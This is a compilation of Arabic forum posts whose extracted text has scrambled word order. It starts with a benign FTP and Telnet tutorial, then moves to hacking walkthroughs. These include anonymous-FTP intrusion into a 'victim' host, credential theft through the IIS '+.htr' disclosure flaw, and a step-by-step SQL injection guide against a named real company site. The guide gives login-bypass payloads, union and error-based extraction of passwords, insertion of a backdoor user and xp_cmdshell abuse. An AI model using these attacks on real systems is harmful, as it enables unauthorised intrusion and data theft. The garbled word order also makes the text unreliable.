ميزات ومن الشبكة على الكمبيوترات بين الملفات نقل الممكنFTP بطريقة النصية الملفات شكل بترجمة تقوم أنها الرائعة

وعليه مختلفة تشغيل نظم تحتوي الكمبيوترات أن حيث أتوماتيكيةأشكال تحتاج Formats فلديها فبالتالي النصية للملفات مختلفة

به ماتقوم وهو لبضع ,FTP لترجمة نحتاج فاننا الملفات نقل وبخدمةجهازنا الى أميركا في ملفا ننقل كي الفأرة على  . نقرات

الملفات نقل  :أقسام

قسمين الى ينقسم الملفات :نقل

الملفات :Download تنزيل

المضيف الكمبيوتر من الملفات جلب المحلي Host وهو الجهاز الىLocal.

الملفات :Uplaod ارسال

المحلي الكمبيوتر من الملفات ارسال الكمبيوتر Local وهو الى.Host المضيف

الملفات لنقل نوعان فهناك األمنية الناحية :ومن

مؤمن :Secure FTP نقل

وتحصل النظام الى للدخول مرور وكلمة مستخدم اسم الى تحتاجالمضيف النظام مدير من .عليه

مجهول :Anonymous FTP نقل

غالبا وتستطيع للدخول مرور وكلمة مستخدم اسم الى التحتاجعنهما anonymous أو guest استخدام .عوضا

أقسام ثالثة الى االنترنت على البرامج :تصنفمصادر

عامة :Public Domain ملكية

ألحد ملكية حقوق فليسهناك العام لالستخدام هنا البرامج وضعتوتعديلها وتوزيعها استخدامها على قيود .وال

مجانية :Freeware مصادر

حقوق هناك ولكن توزيعها أو البرامج هذه استخدام للجميع يحقبيعها أو تعديلها يجوز وال ونشر .ملكية

مشتركة :Shareware مصادر

التتضمن وقد الشراء قبل التجربة بغرض البرامج هذه توزيع يتممدتها انتهاء بعد النسخ تحطيم ويجب المميزات .جميع

FTP الفيروسات  : و

قسمين الى تنقسم والبرامج الملفات أن البداية في تعلم أن يجب

ASCII:

لـ )American Standard Code for Information Interchange(اختصاراجزيئات سبعة على تحتوي النوع هذا من تتراوح bits والملفات

و الصفر بين عن. 127قيمتها للتعبير المصطلح هذا ويستخدم . الكمبيوتر في أرقام الى األحرف بتحويل يقوم الذي المعيار

الصيغ من النوع هذا النصية الملفات .وتستخدم

Binary:

جزيئات ثمانية على وتحتوي الثنائي النظام ذات الملفات وتعنيbits و الصفر بين والملفات 255تتراوح والبرامج الصور وتندرج

النوع هذا تحت .المضغوطة

ملفات عبر تنتقل أن يمكن ال أن ASCII والفيروسات اليمكن كماكصيغ الصور عبر امتدادات jpg & gif & bmp تنتقل من وغيرها

مثل والصوت الفيديو ملفات عبر وال - avi - ram - mpg - mp3 الصور

wav النظام وملفات البرامج عبر تنتقل فانها آخر وبمعنى وغيرها،ماتكون وعادة المضغوطة والبرامج - exe - com - bat - dll :والتشغيل

drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx ، أن يمكن كماتطبيقات عبر الماكرو فيروسات MS Office تنتقل ، من احذر لذلك

تشغيلها قبل دائما وافحصها الملفات .هذه

الملفات نقل  : FTP طريقة

وهي الملفات لنقل عديدة طرق :هناك

نظام باستخدام الملفات UNIX نقل

أوامر بعض وهاهنا أوامر استخدام عادة العملية هذه :UNIX تتطلب

ascii: ملفات الحاجة ASCII لنقل ثم الوضع هذا تغيير وعند النصية،األمر اعادة فيجب النوع هذا من ملفات .لنقل

binary: الحاجة ثم الوضع هذا تغيير وعند الثنائية، الملفات لنقلاألمر اعادة فيجب النوع هذا من ملفات .لنقل

status: نوع من هو هل ومعرفة الملف .Binary أو ASCII لفحص

help: بأوامر قائمة .UNIX لعرض

dir: الدليل  عرضمحتويات

ls: الحالي الدليل .عرضمحتويات

cd directory: الدليل .تغيير

get filename: جهازك على وانزاله المطلوب الملف .جلب

mget filename: الملفات من مجموعة .جلب

pwd: الحالي الدليل .طباعة

bye: البعيد النظام من والخروج االرتباط .انهاء

حساب باستخدام الملفات :Shell نقل

الملقن ادخال هو الملفات نقل من النوع هذا في ماتفعله أولفي حسابك تدخل سوف فمثال الخدمة توفير Tripod الخاصبشركة

طريق Unix Shell عن ، األمر أوال المرادة ftp نكتب بالوجهة متبوعاالمثال ftp ftp.tripod.com :فيصبح سبيل عل وهو االسم ندخل ثم

"IronPrivate" ، وبعد "******". مثال وهو السري الرقم بادخال نقوم ثمنفسأوامر استخدام يمكنك الحساب الى .المعتادة Unix الدخول

الـ نظام عن المعلومات من المزيد أردت Unixوإذا

الموقع هذا الى الدخوول : عليك

http://www.pc-worlds.net/lunexx.html

النظام هذا فى المبتدئين يفيد . فهو

المتصفح باستخدام الملفات :Browser نقل

سوى عليك فما جدا المتصفحاتسهل طريق عن الملفات نقلالموقع عنوان بكلمة URL ادخال العنوان ftp:// ويبدأ بدال العنوان ثمكلمة الـ http:// من موقع الى الدخول بعد العادية، FTPللعناوينالنقر سوى وماعليك ومجلدات ملفات عن عبارة الصفحة ستأتي

النزاله المطلوب الملف .على

حساب باستخدام الملفات :SLIP/PPP نقل

باستخدام لنا تسمح أنها الربط من النوع هذا استخدامات أفضلتابعة استخدامه .Client Programs برامج يمكن تابع برنامج وأفضل

برنامج Windows للنوافذ .Ws_ftp هو

برنامج  :Ws_ftp LE 5.06 استخدام

البرنامج، أيقونة على المزدوج بالنقر وذلك البرنامج على ادخلحوار مربع لك تقوم Session Profile سيظهر خالله من والذي

خانة في اكتب الدخول، الدخول؛ Profile Name بتسجيل حساب اسمالمثال سبيل خانة My Home Page In Tripod على في Host واكتب

Name هو المثال هذا وفي الملقن خانة ftp.tripod.com اسم في ثمHost Type اختر Auto Detect نوع في التلقائي بالتدقيق يقوم لكي

خانة في االسم بكتابة قم ذلك بعد المضيف، الجهاز User ID نظام مثال خانة IronPrivate وهو في السري الرقم وسيظهر Password ثم

اضغط ******, ثم نجوم هيئة على OK مخفيا23. المطلوب الحساب الى بالدخول البرنامج سيقوم ذلك بعد

جهاز هو األيسر القسم قسمين؛ الى البرنامج نافذة وستنقسمفي المضيف، الكمبيوتر جهاز هو األيمن والقسم لديك الكمبيوتر

أو اسمائها تغيير أو الملفات ارسال أو جلب تستطيع المرحلة هذه . على ... حسابك محتويات في التحكم تستطيع أي الخ حذفها

فائقة بسهولة جهازك على أو  .االنترنت

البعيد الشبكي االتصال باستخدام الملفات  :Telnet نقل

Telnet ويسمح بعد عن الربط لخدمات معياري انترنت بروتوكول هيوكأنه جهازه جاعال مضيف كمبيوتر على جهازه بربط للمستخدم

. نظام العرضحسب ويختلف البعيد الكمبيوتر ذلك من جزء . نظام يستخدم البعيد الجهاز كان اذا المضيف Windows الكمبيوتربعضاألوامر معرفة فيجب آخر نظام يستخدم كان اذا أما مشكلة فال

" قائمة " لك يحضر والذي ؟ هو تعرفه أن يجب أمر وأهم للتحكم

الالزمة  .باألوامر

برنامج -  :Windows من Telnet استخدام

يسمى Windows ترفق سهال عليه Telnet برنامجا الدخول يمكنكابدأ قائمة على تشغيل Start بالضغط اكتب Run ثم Telnet ثم

.. من للبرنامج البدء صفحة لك Remote اختر Connect وستنفتحSystem. الحوار صندوق اكتبفي Connect في لك سيظهر الذيخانة Host Name خانة في اكتب ثم المضيف الجهاز ملقن Port اسم

) من ) اختر ثم هو، كما اتركه او لديك كان اذا المنفذ أو الميناء، Term Typeالـ . اضغط ذلك بعد بالتجربة قم واال لديك كان ان

Connect . السري والرقم االسم الدخال فستحتاج الربط يتم وعندمااختر النقل من االنتهاء قائمة Disconnectوبعد وبعد Connect من

اختر .Exit ذلك،،،انتهى

طريق " عن "FTP اإلختراق

> الهكر مدرسة منتدى من >منقول> hacker dz :الكاتب<

فتيبي عبر إقتحام طريقة نتناول سوف اليومFTP

البور الضحية لدى يكون ان يجب اإلقتحام لنجاح و أوال21

الخاصب البور هو و مفتوحFTP

هي و السكان برامج تستعمل ان عليك مفتوح البور أن من لتأكد واهمها من و كثيرة

Superscanneهي و الثانية الخطوة الى ننتقل مفتوح البور ان تتأكد بعدما

على  إضغطStart ثمRun

اكتب ثمftp –n

عليها الدوسمكتوب في نافدة لك تطلع سوفFTP<

تمام شيء كل هنا لحد ؤوكياكتب بعدين و

Openعلى إضغط  ثم إدخالEnter

التالية النتيجة عب تتحصل سوفFTP<To 

بجانب  أكتبTo

إدخال على إضغط ثم للضحية اإلبي رقممعي بالك خد اآلن و

تخطيتخطوة فقد الرد هدا على تحصلت إداConnected to www.assassin.com

220 websrv1 Microsoft FTP Service )Version 4.0(.التالية الكتابة أكتب اآلن و

ftp<quote user ftpتخطيتخطوة فقد الرد هدا على تحصلت إدا

331 Anonymous acces allowed, send identify )e-mail name( as password.

التالية الكتابة أكتب اآلن وftp<quote cwd ~root

تخطيتخطوة فقد الرد هدا على تحصلت إدا530 Please login with USER and PASS

التالية الكتابة أكتب ثمftp<quote pass ftp

تخطيتخطوة فقد الرد هدا على تحصلت إدااإلقتحام في نجحت و

230 Anonymous user logged in.الضحية جهاز في اآلن أنت مبروك

بإستعمال تقوم ان اال اآلن عليك  ماالفتيبي اوامر

الي المشكلة في تقعو ال لكي الكرام مرور عليها امر لن طبعا وعلى فكرة ال و أعرف ما دون من اإلقتحام نجاح هي و فيها وقعت

من بقاليأكثر تضحكو ان اردتم إدا و الفتيبي انا 20اوامر و دقيقة لهدا و شيء أي أعمل أن دون من عالقة الضحية و اإليدي مجمد

اإلقتحام نجاح بعد مباشرةا تطبقوها لكي الىوامر بحضير قمت

Pwdديسك الهارد يحتويه ما تعر لكي

Cd مثال مجلد إلقتحامCd black

بالك المسمى مجلد بإقتحام قمت المثال هدا فيLs

ديسك الهارد أو المجلد محتوى لك يتضح لكيGet 

جهازك بتاع المكتب الىسطح تحمل  لكيمثال

Get black.exePut

ل العكسية العمليةGet

في تضعه و جهازك بتاع المكتب سطح ملفمن تأخد ان  يعنيالضحية جهاز فيمثال

Put black.exeClos 

الضحية مع اإلتصال لقطع

الي الرسائل أنواع على تطرق سون اآلن و األوامر أهم هديو شرحها و األوام تطبيق أثناء الضحية جهاز من عليها نتحصل

ارقامها

Codes: Signification:110 Restart marker reply.

120 Service ready in nnn minutes. )nnn est un temps(125 Data connection already open; transfer starting.150 File status okay; about to open data connection.

200 Command okay.202 Command not implemented, superfluous at this site.

211 System status, or system help reply.212 Directory status.

213 File status.214 Help message.

215 NAME system type.220 Service ready for new user.

221 Service closing control connection.225 Data connection open; no transfer in progress. 

226 Closing data connection.227 Entering passive mode )h1, h2, h3, h4, p1, p2(.

230 User logged in, proceed.250 Requested file action okay, completed.

257 "PATHNAME" created.331 User name okay, need password.

332 Need account for login.350 Requested file action pendingfurther information.421 Service not available, closing control connection.

425 Can't open data connection.426 Connection closed; transfer aborded.

450 Requested file action not taken. )Fichier déjà utilisé par autre chose(

451 Requested action aborded: local error processing.452 Requested action not taken. )Pas assez de mémoire pour

exécuter l'action(500 Syntax error, command unrecognized.

501 Syntax error in parameters or arguments.502 Command not implemented.503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.532 Need account for storing files.

550 Requested action not taken. )Fichier non trouvé, pas d'accès possible,...(

551 Requested action aborded: page type unknown.552 Requested file action aborded.

553 Requested action not taken. )Nom de fichier non attribué(

،،،انتهى

الـ " " SQLاختراق

> الحلم منتدى من >منقول> linuxray :الكاتب<

ال : االسكيو ماهي البداية في  ؟؟) SQL ( س

واغلب جداول على تحتوي بيانات قاعد عن عبارة هي ال االسكيوب منتهية صفحاتها تكون التي تسحب ASP المواقع صفحات هي

بياناتهاقاعدة المعلومات ASP وصفحات SQL من من كنز تكون ان ممكنبيانات قواعد و SQL الختراق ، الحقا اليه اشير ماسوف SQL وهذا

البورت على 1433تتنصتال ان به اخبرك ان مااريد قاعدة SQL ايضا من اكثر على تحتوي قد

يمكن الجداول من عدد على تحتوي بيانات قاعدة وكل بياناتبيانات كبرقواعد تتصور التى SQL ان البيانات من الكبير والعدد

. تحتويها

بيانات : قاعدة اخترقت اذا منه استفيد ان يمكن مالذي ؟ SQL ساقصد ال منتدى الموقع هذا كان اذا الموقع نشاط حسب على هذا

منتديات PHP منتديات جميع ASP بل على تحصل الغالبسوف فياسماء

موضوع اي وحذف تعديل وبامكانك السر وكلمات المستخدمينميزة على يحتوي الموقع كان اذا اما ، بها تحلم تكن لم وصالحيات

، االيميالت من خيالية اعداد على تحصل فسوف المراسالت قائمةاذن ثريا تصبح وسوف واالعالن للدعاية شركة بانشاء قم عندها

_LinuxRay التنسىارقام - اشخاص معلومات بيانات قواعد داخل شئ اي تجد ان توقعتصبح - - ان ممكن ، الميالد تورايخ عناوين . Administrator هواتف

جديد من نشاطك استعد لكن االن الملل اصابك قد انه اعرفطويال مازال  ... فالطريق

بيانات : قواعد على للدخول تحتاجة مالذي ؟ SQL س

لل فقط Passwd و User Name تحتاج

؟ : المرور وكلمة المستخدم اسم على احصل اين من س

على للحصول عديدة طرق كما User name and Passwd هناك منهاال نوع ASP اسلفصفحات من اخرى ثغرات sql.* وملفات هناك

يمكن كثيرثغرة مثل المرور كلمات على منها تحصل htr.+ ان

الثغرة هذه تستخدم : كيف

http://target/page.asp+.htr target : الهدف الموقع

Page : صفحة asp+.htr : الثغرة

حرف .... اي على التحتوي بيضاء صفحة بفتح احيانا تقوم الثغرة هذههو الفائدة منها اذن مالفائدة تتساءل سوف انك اعرف

الى اذهب البيضاء الصفحة هذه اوامر View Source خلف ترى لكيب الخاصة الوضع ASP البرمجة في تراها ان لك اليمكن التى

مثل : العادي

>%

Set DB= Server.CreateObject)"ADODB.Connection"(DB.Open "DRIVER=SQL

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"

%<-----------------------------------------------------------------

هو المستخدم اسم ان ترى السابق الكود LinuxRay_ فيهي السر 6666666وكلمة

-----------------------------------------------------------------

ال صفحة في خطأ هناك كان اذا احيانا انه المضحك مثل ASP الشئ: االتي

AMicrosoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/filename.inc, line 5

بامتداد ينتهي ملف يتم inc.* هناك اوامر على يحتوي ملف هذاوكلمة المستخدم اسم على ويحتوي الملقم جانب من تنفيذها

المرور

الملففي اسم باضافة وذلك الملف هذا بسحب قم تنتظر ماذا اذنالموقع . عنوان

صفحة في االمر هذا مثل ترى ان ASP وممكنملف داخل البرمجة اوامر ان يعني هذا عليها الثغرة تطبيق عند

database.inc

>!--#include file = "database.inc"--<

ملفات مثل المرور كلمة على تحتوي ملفات عدة وهناك

global.asa++global.asa

beforemilion-global.asa-global.asamilion.sql

global-direct.asa

هو هذا لكن االسماء بهذه الملفات تكون ان الضرورة ليسمنمبرمجين قبل من عليه SQL المعتاد

االتي مثل الصفحة اسم تكتب ان فعله ماعليك : وكل

global.asa+.htr

في قديمة ثغرة صفحة IIS 3 هناك بعد تضيف ان هذا ASP وهييلي data$:: الرمز كما

file.asp::$dataعلى اال التعمل الثغرة فقط IIS 3 هذه بتطبيقها نفسك تتعب فال

اكثر ال . للعلم

المستخدم ... اسم على الحصول بعد ماذا النهاية من اقتربنا لقد؟؟ المرور وكلمة

ال قاعدة على الدخول !! SQL بعدها

استخدم انا البينات قاعدة على تدخل برامج عدة Visual هناكinterdev 6.0 السهل البرنامج استخدام افضل مازلت ACCESS لكني

2000

قائمة الى الذهاب البرنامح فتح هو فعله عليك ما كلFileاخترNew

اختار الجديدة الملفات قائمة ومنProject )Exiting Data(

موجودة بيانات قاعدة مشروع . اي

اختر الملف النشاء مربع لك سيظهرCreate

انشاء ايمربع سترى االن

Data Link Properties

اسم - بي االي او الموقع اسم معلومات لثالث فقط تحتاجالمرور - كلمة المستخدم

صندوق - 1 في الموقع اسم Select or enter server name ادخل

في - 2 المستخدم User Name اسم

السر - 3 Password كلمة

مربع ( مالحظة من الصح بإزالة )Blank Password قم

على البداية في الختبار Test Connection اضغط االسفل فيالعبارة هذه رأيت اذا البيانات بقاعدة Test Connection االتصال

Succeededبنجاح تم البيانات بقاعدة االتصال ان .فمعناه

القائمة من اليها الدخول تريد بيانات قاعدة اي تختار ان االن يمكنك: المسندلة

Select the data base on the serverعلى موافق OK واضغط . او

،،،انتهى

الـ " عن " SQLدرسمفصل

> اإلسالمية الحزم شبكة منتديات من >منقول> hish_hish :الكاتب<

نحن ما ومنها ديناميكيه صفحات إلستخدام المواقع غالبية أتجهتفيه  موجودين

المعلومات من كبير كم فيها بيانات قواعد , وتستخدمالديناميكيه الويب لغات بإحدى مكتوب سكربت طريق أو PHP وعن

ASPالبيانات قواعد محركات مع جمب إلى جمبا تعمل . والتي

SQL Server , MySQL,Oracleالبقيه وترك المطلوبه المعلومات أستخالص  يتم

بعضها ويستخدم تعالج ثم ومن المستخدم من معلومات تأخذ حيثتكون في

الـ بعض SQL أوامر صحة من التأكد أو البيانات أستخالص ليتملبناء المدخالت

رفضه أو المستخدم قبول أو المطلوبه الصفحةالتي الصفحات في مرور وكلمة مستخدم أسم طلب يتم دائما

ال عمل بعمل تخولكبها للقيام الصالحيه بإعطائه الموقع صاحب قام من إال به يقوم

موضوعي بحذف يقوم القائمه   كأن في تثبيته أو   (((وأن البيانات قاعدة في المستخدم أسم وجود من التأكد يتم حيث

أسم بجانب الموجوده لتلك مطابقه المعطاه المرور كلمةالمستخدم

الـ أمر في وتضمينها معلومه أخذ يتم بالتأكد SQL حيث يقوم الذيوصالحيتها وجودها من

للتأكد المستخدم بتوثيق يقوم سكربت كتابة عند الحذر يجب ولكنال أم المحميه للصفحه بالدخول له مخول أنه من

من وخلوها المستخدم من المستقبله القيم نظافة من بالتأكد وذلكالـ أمر تجعل أن شأنها من رموز  خاطئ SQL أي

به مسموح غير أمر بأي القيام أو بنائه في

يسمى ما عن اآلن  SQL injection سنتكلمموقع بوجود وأيضا التوثيق سكربت كتابة ضعففي أنه حيث

للتجربهالسعوديه اإلتصاالت شركة موقع  وهو

الموقع /http://www.stc.com.sa عنوانخدمة يختصبمقدمي رابط نجد الرئيسيه للصفحة الدخول عند

السعوديه في أنترنتhttp://www.stc.com.sa/arabic/scripts...asp?pagenum=25 وهو

مرور وكلمة مستخدم أسم منك يطلب فأنه دخوله !!!! عندالـ هو لنا يتبادر ما أول هذه الحاله في SQL injection دائما

بتجربة  نقوممستخدم ' : أسم

مرور ' : وكلمةالتالي الخطأ على  فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed

quotation mark before the character string '' '. /arabic/Scripts/ar_csd_reply.asp, line 33 

________________________________________

التالي الخطا يظهر الحاالت بعض وفي :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed

quotation markbefore the character string ''' AND Password=''.

/admin/admin.asp, line 13________________________________________

الـ أمر من جزء على حصلنا هذا الخطأ أحد SQL وفي أسم وأيضاالجدول في األعمده

عمل أمكانية يؤكد ما للتحقق SQL Query للـ inject وهو المستخدمه

المدخله المرور وكلمة المستخدم أسم . صالحيةالـ عن لنتكلم التفصيل SQL injection إذن من بشيء

المستخدم اسم صالحية من بالتأكد يقوم سكربت لدينا كان لوبالطريقة منها سنتحقق قأننا المستخدم من المدخله المرور وكلمة

التاليهcode:

________________________________________

SELECT * from Users WHERE User_Name='>field from web form<' AND Password='>field from web form<'

if) TRUE ({Login OK

}else {

Login FAILD}

________________________________________

يقوم فأنه المحميه للصفحة بالدخول لهم المسموح أحد قيام عندبالدخول له يسمح أن قبل نفسه بتوثيق تأكيد بكل

به الخاصه المرور وكلمة المستخدم أسم بأدخال قيامه  فعندالمستخدم admin : أسم

المرور t0ps3cr3t : كلمةالـ امر شكل التالي SQL فإن بالشكل : سيصبح

code:________________________________________

SELECT * from Users WHERE Users_Name='admin' AND Password='t0ps3cr3t'

________________________________________

جدول في سطر وجود يكون User وعند أن وهو الشرط فيه تحققالمستخدم المرور admin اسم  t0ps3cr3t وكلمة

قيمة بإرجاع سيقوم األمر مخول TRUE فأن المستخدم أن أي. بالدخول

إرجاع سيتم ذلك الدخول FALSE غير رفض وسيتم

الـ : بأوامر المعرفه من القليل ولو لديك يكون أن يجب SQL مالحظه.

>field from web form< صفحة في المستخدم أدخله ما محلها يحلصالحيته من التحقق

لكلمة ' وبالمثل مستخدم كإسم بإدخال قمنا عندما تجربتنا فيالـ أمر فأن التالي SQL المرور بالشكل : أصبح

code:________________________________________

SELECT * from Users WHERE User_Name=' ' ' AND Password=' ' '________________________________________

عالمة وبقي التنصيصاألولى عالمة بإغالق قمنا أننا ونالحظ

بعد تغلق  تنصيصلمالخطأ رسالة لظهور أدى ما !! وهو

مستخدم ا�م بتجربة نقوم blah' OR '1'='1 : األنالمرور لكلمة .ومثلها

الـ أمر شكل SQL فيصبحcode:

________________________________________

SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'

________________________________________

حدا على جزء كل األمر لنحللSELECT * from Users

الجدول من السطور جميع أختر Users تعنيWHERE User_Name='blah' OR '1'='1' AND Password='blah' OR

'1'='1'الذي وهو بإختياره سنقوم الذي السطر بتحديد نقوم الجزء هذا في

الشروط فيه تتحقق'blah' OR '1'='1'

بوجود أصبحتشرط OR هنا ولكن نصيه قيمة تصبح لماألطراف من األقل على واحد طرف كان إذا صحيح الشرط يصبح

الشرطصحيح في المشتركههو األول الطرف فإن حالتنا 'blah' وفي

قيمة عن يعبر االن صددها في لسنا تفاصيل الخوضفي بدون وهوTRUE صحيحه

هو ' األخر 1'='1والطرف 'كانت إذا عن اإلجابة لـ 1يمكنك ال 1مساويه أم !!!!

هو تحليله بعد الشرط شكل سيكون TRUE OR TRUE إذاللشرطهي النهائيه النتيجه فإن TRUE وبالتالي

المرور لكلمة تحدث التفاصيل ونفس : القيمه جدا مهمه ليست TRUE مالحظه الشرط من نحصلها التيللكلمه بنا TRUE مساويه الخاصه المفاتيح لوحة على نكتبها التي

مستخدم أسم إستخدام تحاول ال مرور TRUE لذلك TRUE وكلمةالـ SQL injection إلتمام

الجدول من سطر أول بأختيار سيقوم السابق ويرجع Users الشرطمصفوفه في  محتوياته

للصفحة الدخول أستطعت قد أنك ستجد الحاالت بعض في وبالتالي المحميه

ال أخرى حاالت في ولكنالتفاصيل ..... لنكمل

الـ أمر في الشرط يكون ربما ألنه التنبه بعد SQL يجب يأتي ما وهوWHERE أشياء عدة من  يتحقق

نستخدم يمكننا , )two dashes( -- لذلك حيث السطر بقية إهمال ليتمالتاليه بالمدخالت قليل قبل أدخالناه ما عن اإلستعاضه

مستخدم --'blah' OR '1'='1 : أسمكلمة ) كتابة إهمال يمكنك الحاالت بعض في المرور كلمة وكذلك

الـ -- أمر في المستخدم اسم بعد تأتي ألنها ستهملها ألن SQL مرور

أحد لتخمين تحتاج لن أنك بحيث ومضمونه جدا مريحه طريقه توجداألعمده أسماء

أستخدام having clause وهيالتاليه بالطريقه

مستخدم 'having 1=1-- أسمكالتاليه خطأ رسالة على سنحصل حيث

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY

clause. 

/Arabic/Scripts/ar_csd_reply.asp, line 33 عمود أول أسم وأيضا الجدول أسم وبها

األعمده بقية اسماء على الحصول لنستطيع بعدهاgroup by سنستخدم

التالي بالشكل--group by cs_isp_user.UserID'

أسمه عمود على سنحصل passwd بعدهاالتالي بالشكل يليه اللي العمود اسم على للحصول فنستخدمه

--group by cs_isp_user.UserID,cs_isp_user.passwd'صفحة على نحصل أن إلى العمود مع جدول كل أسم زيادة ونكرر

خاطئ المستخدم أسم بأن ! تخبرنا

في األعمده أسماء من ممكن قدر أكبر بجمع نقوم أن األن نحتاجالجدول هذا

التالي بإدخال : نقوممستخدم --)blah' group by )username : أسم

التالي الخطأ على : فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column

name 'username'. /arabic/Scripts/ar_csd_reply.asp, line 33

________________________________________

األسم له الجدول هذا في عمود يوجد ال بأنه يفيد ما username وهومثل الشائعه األسماء بتجربه نقوم

password ,username,id,userid,email,first_name

لـ تجربتنا عنه userid عند نبحث ما وهو أخر خطأ على نحصل  فأننا :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column

'cs_isp_user.passwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY

clause. /arabic/Scripts/ar_csd_reply.asp, line 33

________________________________________

وهو الجدول أسم وهي معلومتين على حصلنا cs_isp_user هناوهو األعمده أحد أسم passwd وأيضا

الجديد العمود اسم بإستخدام ولكن السابق العمل بتكرار االن نقومالتالي المستخدم أسم بإدخال --)blah' group by )passwd : فنقوم

التالي الخطأ على : فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column

'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY

clause. /arabic/Scripts/ar_csd_reply.asp, line 33

________________________________________

وهو عمود أسم على وهو UserID حصلنا بتخمينه قمنا ما نفسه وهوuserid

أن إلى اإلشاره األحرف MS SQL Server تجدر  ليسحساسلحالةأسماء على إال نحصل وال منتهيه غير حلقه في سنكون أننا نالحظ

passwd و UserID الجداولعليها حصلنا التي وهي عمودين على إال يحوي ال الجدول إذنوبعدها للجدول جديد مستخدم بأدخال نقوم هذه الحاله في إذن

بتسجيل الخاصه الصفحه من طبيعي بشكل بالدخول نقوم الدخول

المستخدم أسم خانة في التالي بكتابة blah' INSERT INTO : سنقومcs_isp_user)UserID,passwd

( VALUES)'M_3','hi'(--مستخدم أسم له جديد مستخدم إضافة سيتم مرور M_3 حيث وكلمة

hiأنك على البيانات بهذه المحميه للصفحة الدخول تستطيع وبعدها

بالدخول له مخول

) عمل ) أمكانية استغالل من أنتهينا اإلتصاالت شركة مثالنا inject فيقرائة نستطبع لكي ممتعه طريقه عن الحديث سنكمل ولكننا لها

بأي الدخول تستطيع وبعدها مرورهم وكلمات المستخدمين اسماءنفسك إضافة دون منها

لشخصمشبوه وجود حول شكوك يضع لن الذي األمر وهواألسم له أخر عمود بإضافة ولكن بدأناه ما رقم id سنكمل وهو

) رقم ) أنه تذكر مستخدم لكل تسلسليأسمه جدول لدينا user إذن

التاليه االعمده  يحويid صحيح رقم وهو

username ) أرقام ) تحوي أن يمكن النصيه القيم نصيه قيمة وهو

admin1 مثالpasswd نصيه قيمه أيضا وهي

عمل يتم ) union نجرب لن عدديه قيمة إلى وتحويلها نصيه لقيمه) جدا ثمينه خطأ رساله سيخرج ولكنه التحويلالمستخدم اسم blah' union SELECT username FROM user : ندخل

شيء في تفيدنا ال خطأ رسالة على سنحصل  وهي الخطأ  رسالة :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal

number of expressions in their target lists. /admin/admin.asp, line 13

________________________________________

بزيادة التالي id نقوم بالشكل فتصبح واحد مرهblah' union SELECT username,username FROM user

الخطأ نفسرسالة على فنحصلمختلفه خطأ رسالة على نحصل أن إلى الزياده  نتابع

اسم أدخال عند الجديده الخطأ رسالة على حصلنا أننا لنفترضالتالي المستخدم

blah' union SELECT username,username,username,username,username FROM user

التاليه الخطأ رسالة على فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting thevarchar value 'Lame_Admin' to a column of data type int.

/admin/admin.asp, line 13________________________________________

  لألدمن يكون ما عادة وهو مستخدم أسم أول على حصلنامحرك من نطلب ألننا هو الخطأ هذا ظهور يقوم SQL وسبب أن

نصيه قيمة عدديه )Lame_Admin وهي( بتحويل قيمة إلى)int (صحيحه

يستطيع , ال أنه بأخبارك يقوم لذلك مسموح الغير الشيء وهوصحيحه Lame_Admin تحويل عدديه قيمة أذكىشي   إلى هذا

 بعمله microsoft قامتكلمة على الحصول وسنحاول المستخدم أسم على حصلنا االن

المرورالتالي المستخدم أسم blah' union SELECT: ندخل

passwd,passwd,passwd,passwd,passwd FROM user

المستخدم أسم على حصولنا عند السابق العدد بنفس

الخطأ هذا على سنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting thevarchar value 'stupid' to a column of data type int.

/admin/admin.asp, line 13________________________________________

الدخول تسجيل ويمكننا المرور وكلمة المستخدم أسم على حصلنالنا أثر أي وجود بدون المحميه للصفحة

بعض بطباعة تقوم لها الدخول عند المحميه الصفحه كانت إذا إالبإسم بالدخول شخضقام ألخر االيبي رقم مثل المعلومات

هذا المستخدمبنفسك به ستقوم بما فكر عندها

الـ عن أتكلم  Stored Procedure بقيمسبقا موجوده أدوات إلى أقرب كتشبيه بعمل Built-in وهي تقوم

طلبها عند محدد

الـ من اإلستفاده الـ Stored Procedure ستستطيع كان SQL إذاServer المستخدم على sa يعمل

الـ عليه يعمل الذي المستخدم كان إذا له SQL Server أو السماح تمبا�ستخدامها

على حصولك عند محظوظ فأنت األمكانيات SQL Server لذلك  بهذه

من أكثر 100يوجد Stored Procedure أهمها التالي الجدول في

+---------------------------+------------------------------------------------------------------------------+

| xp_cmdshell----------| ( على تنفيذه يتم التشغيل لنظام أمر تمرير) المستخدم صالحيات |-------حسب

| xp_regread-----------| في مفتاح قيمة قراءة|--------------------------------------------الريجستري

| xp_regdeletekey----| من مفتاح حذف|-------------------------------------------------الريجستري

| xp_regdeletevalue-| من مفتاح قيمة حذف|--------------------------------------------الريجستري

| xp_regwrite ----------| في للكتابة|-------------------------------------------------------الريجستري
